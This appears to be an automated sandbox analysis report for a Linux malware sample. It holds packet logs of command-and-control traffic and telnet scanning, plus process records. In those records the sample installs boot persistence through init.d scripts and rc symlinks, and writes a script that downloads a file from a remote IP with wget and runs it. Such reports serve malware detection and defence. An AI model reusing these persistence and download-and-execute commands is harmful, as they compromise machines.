                                                                          Dec 5, 2024 07:27:46.676656961 CET19938972154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.686739922 CET19938974154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.686785936 CET38974199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.691559076 CET38974199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.693974972 CET38974199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.723181009 CET4433360654.171.230.55192.168.2.23
                                                                          Dec 5, 2024 07:27:46.723191977 CET19938972154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.743344069 CET38976199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.811392069 CET19938974154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.855339050 CET19938974154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.863262892 CET19938976154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:46.863360882 CET38976199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.877403021 CET38976199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.880012989 CET38976199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.885039091 CET38978199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:46.997205973 CET19938976154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:47.004801035 CET19938978154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:47.004952908 CET38978199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:47.043102980 CET19938976154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:47.099642992 CET38978199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:47.100706100 CET38978199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:47.167714119 CET3524423192.168.2.23213.181.192.16
                                                                          Dec 5, 2024 07:27:47.200325966 CET6002638242192.168.2.2394.156.227.234
                                                                          Dec 5, 2024 07:27:47.218143940 CET3856023192.168.2.2313.114.223.24
                                                                          Dec 5, 2024 07:27:47.219456911 CET19938978154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:47.252314091 CET4385223192.168.2.23186.161.57.239
                                                                          Dec 5, 2024 07:27:47.257626057 CET3736823192.168.2.23132.163.61.148
                                                                          Dec 5, 2024 07:27:47.261208057 CET5284623192.168.2.23181.221.140.128
                                                                          Dec 5, 2024 07:27:47.263081074 CET19938978154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:47.265633106 CET4790623192.168.2.2384.16.187.43
                                                                          Dec 5, 2024 07:27:47.271111965 CET5251623192.168.2.239.74.43.104
                                                                          Dec 5, 2024 07:27:47.275903940 CET5014023192.168.2.23169.68.103.115
                                                                          Dec 5, 2024 07:27:47.279684067 CET4123223192.168.2.23141.55.192.117
                                                                          Dec 5, 2024 07:27:47.284323931 CET3298423192.168.2.23180.138.114.124
                                                                          Dec 5, 2024 07:27:47.287494898 CET2335244213.181.192.16192.168.2.23
                                                                          Dec 5, 2024 07:27:47.287561893 CET3524423192.168.2.23213.181.192.16
                                                                          Dec 5, 2024 07:27:47.288804054 CET3433423192.168.2.23174.59.252.56
                                                                          Dec 5, 2024 07:27:47.293482065 CET4801223192.168.2.23166.173.139.121
                                                                          Dec 5, 2024 07:27:47.296710968 CET5573423192.168.2.2363.4.197.151
                                                                          Dec 5, 2024 07:27:47.307054043 CET5411023192.168.2.2327.159.156.110
                                                                          Dec 5, 2024 07:27:47.320111036 CET382426002694.156.227.234192.168.2.23
                                                                          Dec 5, 2024 07:27:47.320185900 CET6002638242192.168.2.2394.156.227.234
                                                                          Dec 5, 2024 07:27:47.324078083 CET3524423192.168.2.23213.181.192.16
                                                                          Dec 5, 2024 07:27:47.338215113 CET233856013.114.223.24192.168.2.23
                                                                          Dec 5, 2024 07:27:47.338294983 CET3856023192.168.2.2313.114.223.24
                                                                          Dec 5, 2024 07:27:47.372067928 CET2343852186.161.57.239192.168.2.23
                                                                          Dec 5, 2024 07:27:47.372119904 CET4385223192.168.2.23186.161.57.239
                                                                          Dec 5, 2024 07:27:47.377325058 CET2337368132.163.61.148192.168.2.23
                                                                          Dec 5, 2024 07:27:47.377367020 CET3736823192.168.2.23132.163.61.148
                                                                          Dec 5, 2024 07:27:47.381870031 CET2352846181.221.140.128192.168.2.23
                                                                          Dec 5, 2024 07:27:47.381907940 CET5284623192.168.2.23181.221.140.128
                                                                          Dec 5, 2024 07:27:47.385569096 CET234790684.16.187.43192.168.2.23
                                                                          Dec 5, 2024 07:27:47.385634899 CET4790623192.168.2.2384.16.187.43
                                                                          Dec 5, 2024 07:27:47.390794039 CET23525169.74.43.104192.168.2.23
                                                                          Dec 5, 2024 07:27:47.390856981 CET5251623192.168.2.239.74.43.104
                                                                          Dec 5, 2024 07:27:47.395582914 CET2350140169.68.103.115192.168.2.23
                                                                          Dec 5, 2024 07:27:47.395626068 CET5014023192.168.2.23169.68.103.115
                                                                          Dec 5, 2024 07:27:47.399349928 CET2341232141.55.192.117192.168.2.23
                                                                          Dec 5, 2024 07:27:47.399400949 CET4123223192.168.2.23141.55.192.117
                                                                          Dec 5, 2024 07:27:47.404010057 CET2332984180.138.114.124192.168.2.23
                                                                          Dec 5, 2024 07:27:47.404048920 CET3298423192.168.2.23180.138.114.124
                                                                          Dec 5, 2024 07:27:47.408478975 CET2334334174.59.252.56192.168.2.23
                                                                          Dec 5, 2024 07:27:47.408523083 CET3433423192.168.2.23174.59.252.56
                                                                          Dec 5, 2024 07:27:47.439791918 CET2348012166.173.139.121192.168.2.23
                                                                          Dec 5, 2024 07:27:47.439851999 CET235573463.4.197.151192.168.2.23
                                                                          Dec 5, 2024 07:27:47.439861059 CET235411027.159.156.110192.168.2.23
                                                                          Dec 5, 2024 07:27:47.439868927 CET4801223192.168.2.23166.173.139.121
                                                                          Dec 5, 2024 07:27:47.439892054 CET5573423192.168.2.2363.4.197.151
                                                                          Dec 5, 2024 07:27:47.440099955 CET5411023192.168.2.2327.159.156.110
                                                                          Dec 5, 2024 07:27:47.458005905 CET2335244213.181.192.16192.168.2.23
                                                                          Dec 5, 2024 07:27:47.458069086 CET3524423192.168.2.23213.181.192.16
                                                                          Dec 5, 2024 07:27:47.661200047 CET4433360654.171.230.55192.168.2.23
                                                                          Dec 5, 2024 07:27:47.661247969 CET33606443192.168.2.2354.171.230.55
                                                                          Dec 5, 2024 07:27:48.157967091 CET43928443192.168.2.2391.189.91.42
                                                                          Dec 5, 2024 07:27:48.206517935 CET19938964154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:48.206597090 CET38964199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:48.332380056 CET19938966154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:48.332432032 CET38966199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:48.472335100 CET19938968154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:48.472389936 CET38968199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:48.643131018 CET19938970154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:48.643172979 CET38970199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:48.768249035 CET19938972154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:48.768304110 CET38972199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:48.909976006 CET19938974154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:48.910036087 CET38974199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:49.098258972 CET19938976154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:49.098330975 CET38976199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:49.255585909 CET19938978154.216.19.139192.168.2.23
                                                                          Dec 5, 2024 07:27:49.255636930 CET38978199192.168.2.23154.216.19.139
                                                                          Dec 5, 2024 07:27:53.533201933 CET42836443192.168.2.2391.189.91.43
                                                                          Dec 5, 2024 07:27:55.069000959 CET4251680192.168.2.23109.202.202.202
                                                                          Dec 5, 2024 07:28:09.147046089 CET43928443192.168.2.2391.189.91.42
                                                                          Dec 5, 2024 07:28:19.385632038 CET42836443192.168.2.2391.189.91.43
                                                                          Dec 5, 2024 07:28:25.532778025 CET4251680192.168.2.23109.202.202.202
                                                                          Dec 5, 2024 07:28:50.101341963 CET43928443192.168.2.2391.189.91.42
                                                                          Dec 5, 2024 07:29:10.578541994 CET42836443192.168.2.2391.189.91.43

                                                                          System Behavior

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:/tmp/x86_64.nn.elf
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl enable custom.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/chmod
                                                                          Arguments:chmod +x /etc/init.d/system
                                                                          File size:63864 bytes
                                                                          MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/ln
                                                                          Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                          File size:76160 bytes
                                                                          MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/chmod
                                                                          Arguments:chmod +x /etc/init.d/sh
                                                                          File size:63864 bytes
                                                                          MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/mkdir
                                                                          Arguments:mkdir -p /etc/rc.d
                                                                          File size:88408 bytes
                                                                          MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/ln
                                                                          Arguments:ln -s /etc/init.d/sh /etc/rc.d/S99sh
                                                                          File size:76160 bytes
                                                                          MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/tmp/x86_64.nn.elf
                                                                          Arguments:-
                                                                          File size:97856 bytes
                                                                          MD5 hash:e67f9408d19e274031b09ddb0df19889

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File size:22760 bytes
                                                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/libexec/gnome-session-binary
                                                                          Arguments:-
                                                                          File size:334664 bytes
                                                                          MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/libexec/gsd-housekeeping
                                                                          Arguments:/usr/libexec/gsd-housekeeping
                                                                          File size:51840 bytes
                                                                          MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/rm
                                                                          Arguments:rm -f /tmp/tmp.jSHAVmWWrE /tmp/tmp.CXFzKUkFGh /tmp/tmp.rl4jlLXWcp
                                                                          File size:72056 bytes
                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/dash
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:45
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/bin/rm
                                                                          Arguments:rm -f /tmp/tmp.jSHAVmWWrE /tmp/tmp.CXFzKUkFGh /tmp/tmp.rl4jlLXWcp
                                                                          File size:72056 bytes
                                                                          MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/sbin/gdm3
                                                                          Arguments:-
                                                                          File size:453296 bytes
                                                                          MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/etc/gdm3/PrimeOff/Default
                                                                          Arguments:/etc/gdm3/PrimeOff/Default
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/sbin/gdm3
                                                                          Arguments:-
                                                                          File size:453296 bytes
                                                                          MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/etc/gdm3/PrimeOff/Default
                                                                          Arguments:/etc/gdm3/PrimeOff/Default
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):06:27:46
                                                                          Start date (UTC):05/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4